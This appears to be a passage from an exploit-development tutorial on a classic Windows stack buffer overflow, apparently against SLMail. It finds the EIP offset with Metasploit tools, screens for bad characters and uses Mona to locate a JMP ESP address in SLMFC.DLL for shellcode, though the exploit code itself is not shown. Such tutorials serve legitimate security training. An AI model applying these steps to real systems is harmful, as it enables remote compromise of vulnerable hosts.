In this section, there are two registers to remember:
ESP - Extended Stack Pointer
push and pop values
EIP - Extended Instruction Pointer
holds the current address location for the instruction being executed at any given time
At this stage we overwritten the the Extended Instruction Pointer (EIP) register with our input buffer of A’s (\x41). Now we need to swap our A's with a unique string of 2700 bytes using the pattren_create.rb tool in Kali:
In the debugger, we could see EIP register has been overwritten with the hex bytes 39694438. Let's calculate the offset using pattren_offset.rb tool in Kali:
root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 39694438
[*] Exact match at offset 2606
The offset 2606 means that those bytes (out of the 2700 paylod) left us 4 bytes to overwrite the EIP address. Let’s translate this to a new modified buffer string in our exploit:
Now if we watch the EIP register, we could see that The EIP register is cleanly overwritten by B's (\x42).
Add space for shellcode
We can see that ESP register points directly to the beginning of our buffer of C's, but the shellcode requires ~350-400 bytes of space and the 90 bytes of our space won't be enough.
Let's increse the total buffer from 2700 to 3500 and make larger buffer space for our shellcode:
There may be certain characters that are considered bad and shouldn't be used in our buffer, return address, or shellcode such as NULL byte (\x00), CR return character (\x0d) and LF line feed (\x0a).
To test which characters are bad we will send the following badchars array with our exploit:
In the debugger, look at memory location at ESP we could see that \x00, \x0a and \x0d are trancated our buffer and not appear correctly in our memory location.
NOTE: This process should repeat as long as no bad characters are return.
Redirect Execution Flow
In this last part, we need to try to get the EIP to point to ESP by using JMP ESP technique.
While application paused in debugger we will use Mona script to locate loaded modules using the command:
!mona moduels
The output should contain list of DLLs and EXEs application may use. We need to locate libaries with no memory protections (ASLR, DEP or Stack Canaries) and it's range does not contain bad chars. In our case we found SLMFC.DLL which has no memory protections.
Next step is locate a JMP ESP opcode (\xff\xe4) address in this DLL using the following Mona command:
!mona find -s "\xff\xe4" -m SLMFC.DLL
Put a breakpoint on this instruction address 5F4A358F (using F2) and update our exploit: